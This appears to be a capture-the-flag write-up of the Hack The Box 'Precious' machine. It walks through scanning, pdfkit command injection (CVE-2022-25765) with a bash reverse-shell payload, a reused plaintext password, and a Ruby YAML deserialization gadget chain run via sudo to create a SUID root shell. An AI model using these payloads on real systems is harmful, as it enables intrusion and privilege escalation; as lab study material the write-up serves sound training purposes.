let's enumerate first.
command: sudo rustscan -a 10.10.11.189
result:
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

command: sudo nmap -sSVC -A -p 22,80 10.10.11.189
result:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-server-header: 
|   nginx/1.18.0
|_  nginx/1.18.0 + Phusion Passenger(R) 6.0.15
|_http-title: Convert Web Page to PDF
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 5.0 - 5.3 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 - 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

command: ffuf -u http://10.10.11.189 -H "Host: FUZZ.precious.htb" -w /snap/seclists/34/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac

register this 10.10.11.189 precious.htb to /etc/hosts
access: http://precious.htb/
command: sudo python3 -m http.server 80
enter url to fetch: http://10.10.16.19

command: exiftool 0ffss14jey5zn47vi3vl7wyj7ej7rvsq.pdf                                              
ExifTool Version Number         : 12.56
File Name                       : 0ffss14jey5zn47vi3vl7wyj7ej7rvsq.pdf
Directory                       : .
File Size                       : 43 kB
File Modification Date/Time     : 2023:07:01 21:23:13+07:00
File Access Date/Time           : 2023:07:01 21:23:40+07:00
File Inode Change Date/Time     : 2023:07:01 21:23:13+07:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 2
Creator                         : Generated by pdfkit v0.8.6

some exploit on pdfkit v0.8.6 
CVE-2022-25765

command: ./feroxbuster -u http://precious.htb -w /snap/feroxbuster/common/wordlist/raft-medium-directories.txt
result:
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher ðŸ¤“                 ver: 2.10.0
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 ðŸŽ¯  Target Url            â”‚ http://precious.htb
 ðŸš€  Threads               â”‚ 50
 ðŸ“–  Wordlist              â”‚ /snap/feroxbuster/common/wordlist/raft-medium-directories.txt
 ðŸ‘Œ  Status Codes          â”‚ All Status Codes!
 ðŸ’¥  Timeout (secs)        â”‚ 7
 ðŸ¦¡  User-Agent            â”‚ feroxbuster/2.10.0
 ðŸ”Ž  Extract Links         â”‚ true
 ðŸ  HTTP methods          â”‚ [GET]
 ðŸ”ƒ  Recursion Depth       â”‚ 4
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 ðŸ  Press [ENTER] to use the Scan Management Menuâ„¢
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
404      GET        1l        2w       18c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       47l       89w      815c http://precious.htb/stylesheets/style.css
200      GET       18l       42w      483c http://precious.htb/
[####################] - 22s    30002/30002   0s      found:2       errors:0      
[####################] - 21s    30000/30000   1402/s  http://precious.htb/

command: sudo python3 -m http.server 80
url fetch: http://10.10.16.19/?name=%20`id`
result:
Directory listing for /?name= uid=1001(ruby)
gid=1001(ruby) groups=1001(ruby)

command: nc -lvnp 7979
url fetch: http://10.10.14.6/?name=%20`bash -c "bash -i >& /dev/tcp/10.10.16.19/7979 0>&1"`

please upgrade shell.

command: sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

command: cd /home/ruby/.bundle
command: cat config 
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

command: su - henry
password: Q3c1AqGHtoI0aXAYFH

command: sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

command: cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

take attention: 
def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

ruby yml exploit:
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve

put code on above to /dev/shm/dependencies.yml 
command: cd /dev/shm
command: sudo ruby /opt/update_dependencies.rb
result:
uid=0(root) gid=0(root) groups=0(root)
Traceback (most recent call last):
	33: from /opt/update_dependencies.rb:17:in `<main>'
	32: from /opt/update_dependencies.rb:10:in `list_from_file'
	31: from /usr/lib/ruby/2.7.0/psych.rb:279:in `load'

change yml exploit to this:
ruby yml exploit:
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cp /bin/bash /tmp/0xdf; chmod 6777 /tmp/0xdf
         method_id: :resolve

command: sudo ruby /opt/update_dependencies.rb
command: ls -al /tmp/0xdf
-rwsrwsrwx 1 root root 1234376 Jul  1 10:36 /tmp/0xdf

command: /tmp/0xdf -p
command: cat /root/root.txt 
7e216fe11fda2b3f649e8ac847c91c73

resource:
https://0xdf.gitlab.io/2023/05/20/htb-precious.html#enumeration-1
